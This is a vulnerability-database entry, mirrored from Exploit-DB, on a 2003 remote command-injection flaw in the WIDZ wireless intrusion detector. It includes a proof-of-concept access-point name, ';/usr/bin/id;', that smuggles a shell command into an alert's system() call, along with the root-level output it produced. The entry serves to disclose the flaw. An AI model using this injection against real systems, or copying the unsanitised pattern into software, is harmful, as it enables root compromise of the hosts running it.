WIDZ 1.0/1.5 - Remote Code Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054123 漏洞类型
发布时间 2003-08-23 更新时间 2003-08-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23054
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8479/info

WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. 

Go to Apple Airport and set network name to ';/usr/bin/id;

This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file